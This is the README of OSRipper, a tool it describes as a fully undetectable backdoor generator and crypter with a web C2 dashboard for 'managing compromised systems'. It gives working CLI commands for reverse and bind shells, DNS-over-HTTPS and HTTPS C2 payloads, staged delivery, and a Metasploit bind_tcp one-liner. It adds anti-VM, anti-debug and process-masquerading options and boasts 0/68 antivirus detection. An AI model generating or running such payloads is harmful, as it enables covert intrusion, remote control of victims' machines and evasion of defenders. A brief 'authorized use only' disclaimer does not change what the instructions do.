Advanced cross-platform payload generator and crypter with FUD capabilities
Features • Quick Start • Web UI • Payload Types • Documentation
OSRipper is a sophisticated, fully undetectable (FUD) backdoor generator and crypter designed for authorized penetration testing and red team operations. It features advanced evasion techniques, multiple payload types, and a modern web-based C2 interface for managing compromised systems.
- Fully Undetectable (FUD) - Advanced evasion techniques bypass modern AV solutions
- Web-Based C2 Interface - Modern dashboard for managing active sessions
- Multiple Payload Types - Bind shells, reverse shells, DoH C2, HTTPS C2, and more
- Multi-Layer Obfuscation - Standard and enhanced obfuscation with randomized variables
- Binary Compilation - Compile payloads to standalone executables
- Encrypted Communications - SSL/TLS and certificate-pinned HTTPS C2 channels
- Stealth Features - VM detection, anti-debugging, process masquerading
| Payload Type | Description | Use Case |
|---|---|---|
| Bind Shell | Opens port on victim machine | Direct access when reverse connections blocked |
| Reverse TCP Meterpreter | SSL/TLS encrypted reverse connection | Standard penetration testing |
| DNS-over-HTTPS C2 | Stealthy DoH-based command & control | Bypass network restrictions |
| HTTPS C2 | Certificate-pinned HTTPS C2 | Secure, authenticated C2 channel |
| Staged Payload | Multi-stage web delivery | Enhanced stealth deployment |
| Custom Code Crypter | Obfuscate any Python script | Custom payload encryption |
- Advanced Obfuscation - Multi-layer code encoding with random variables
- Enhanced Obfuscation - Anti-debug, VM detection, junk code injection
- Anti-VM Detection - Sandbox and virtual machine evasion
- Stealth Delays - Random startup delays (5-15 seconds)
- Process Masquerading - Disguise as legitimate system processes
- Signature Randomization - Every payload is unique
- Session Dashboard - View all active C2 sessions
- Interactive Terminal - Execute commands via web interface
- Payload Generator - Generate payloads directly from web UI
- Session Management - View system info, command history, and manage sessions
- Real-time Updates - Live command execution and response viewing
- Ngrok Integration - Automatic tunnel creation for dynamic IPs
- Certificate Pinning - Secure HTTPS C2 with certificate validation
- Session Persistence - Maintain connections across restarts
- Command Queueing - Queue commands for offline agents
- Response Parsing - Automatic parsing of command output
# Clone repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Install dependencies
pip3 install -r requirements.txt
# Install package
pip3 install -e .Interactive Mode:
osripper
# or
python3 -m osripperCommand Line:
# Generate reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Generate DoH C2 payload
osripper-cli doh -d example.com --obfuscate --compileWeb UI:
# Start C2 server with web UI
python -m osripper.c2.server example.com --port 5000
# Access dashboard at http://localhost:5000OSRipper includes a modern web-based C2 interface for managing compromised systems.
- Dashboard - Overview of all active sessions
- Session Management - View system information and execute commands
- Payload Generator - Generate DoH and HTTPS payloads via web interface
- Command History - Track all executed commands and responses
- Real-time Updates - Live command execution and response viewing
# Basic usage
python -m osripper.c2.server example.com
# With HTTPS
python -m osripper.c2.server example.com --https
# Custom port
python -m osripper.c2.server example.com --port 8080
# With custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.keyOnce the server is running, access the dashboard at:
- HTTP:
http://localhost:5000 - HTTPS:
https://localhost:5000(if enabled)
Opens a port on the victim machine and waits for connections.
osripper-cli bind -p 4444 --obfuscate --compileConnection:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'Encrypted reverse connection with SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compileStealthy C2 channel using DNS-over-HTTPS protocol. Bypasses many network restrictions.
# Generate payload
osripper-cli doh -d example.com --obfuscate --compile
# Start C2 server
python -m osripper.c2.server example.comFeatures:
- Stealthy DNS-based communication
- Web UI for session management
- Automatic session persistence
- Command queueing for offline agents
Secure HTTPS C2 with certificate pinning for authentication.
# Generate payload (via web UI or CLI)
# Start C2 server with HTTPS
python -m osripper.c2.server example.com --https
# Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprintFeatures:
- Certificate pinning for security
- Encrypted HTTPS communication
- Web UI integration
- Session management
Multi-stage web delivery for enhanced stealth.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscateObfuscate and encrypt any Python script.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile| Option | Description |
|---|---|
--obfuscate |
Enable multi-layer obfuscation |
--enhanced |
Enhanced obfuscation (anti-debug, VM detection) |
--compile |
Compile to standalone binary |
--icon PATH |
Custom icon for compiled binary |
--delay |
Add random startup delay (5-15 seconds) |
--output, -o NAME |
Output filename |
--quiet, -q |
Quiet mode (minimal output) |
# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 with all features
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Custom script encryption
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Using ngrok for dynamic IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile- Python Payload: 0/68 Detection Rate
- Compiled Binary: 0/68 Detection Rate
┌─────────────────┐
│ Generated │
│ Binary │
└─────────────────┘
│
│ Execute
▼
┌──────────────────┐
│ Obfuscated │
│ Dropper │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ C2 SERVER │
│ (Web UI) │
│ │
└─────────────────┘
│
│ Command/Response
▼
┌─────────────────┐
│ Agent │
│ Execution │
└─────────────────┘
# Generate payload with ngrok
osripper-cli reverse --ngrok -p 4444
# Follow prompts to set up tunnel
# Run: ngrok tcp 4444osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.icoStandard Obfuscation:
- Multi-layer encoding
- Variable randomization
- Code structure obfuscation
Enhanced Obfuscation:
- All standard features
- Anti-debugging techniques
- VM detection
- Junk code injection
- Advanced evasion
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Enhanced
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced# 1. Start C2 server with HTTPS
python -m osripper.c2.server example.com --https
# 2. Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint
# 3. Generate payload with fingerprint (via web UI)
# Or use the fingerprint in your payload generation- Wiki - Comprehensive documentation
- Usage Guide - Detailed usage instructions
- API Reference - Developer documentation
- FUD payload generation (0/68 detection)
- Web-based C2 interface
- DNS-over-HTTPS C2 payload
- HTTPS C2 with certificate pinning
- Multi-layer obfuscation engine
- Session management system
- Command queueing and execution
- Anti-VM detection
- Process masquerading
- Enhanced post-exploitation modules
- Advanced persistence mechanisms
- File upload/download via web UI
- Multi-user support for C2 server
- AI-powered evasion techniques
- Blockchain-based C2 infrastructure
- Mobile platform support
- Advanced social engineering payloads
We welcome contributions from the security research community!
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing-feature) - Commit your changes (
git commit -m 'Add amazing feature') - Push to the branch (
git push origin feature/amazing-feature) - Open a Pull Request
- Follow PEP 8 coding standards
- Add docstrings to all functions
- Test on multiple platforms
- Ensure FUD capabilities remain intact
Special thanks to the security research community and these projects:
- htr-tech/PyObfuscate - Obfuscation inspiration
- cedowens/SwiftBelt - macOS enumeration
- Metasploit Framework - Payload handling
IMPORTANT: This tool is developed for educational purposes and authorized penetration testing only.
- Authorized Use: Security research, penetration testing, red team exercises
- Prohibited Use: Unauthorized access, malicious activities, illegal purposes
The developers are not responsible for misuse of this software. Users must comply with all applicable laws and regulations.
- Bug Reports: Open an Issue
- Feature Requests: Discussions
- Security Issues: Contact maintainers privately


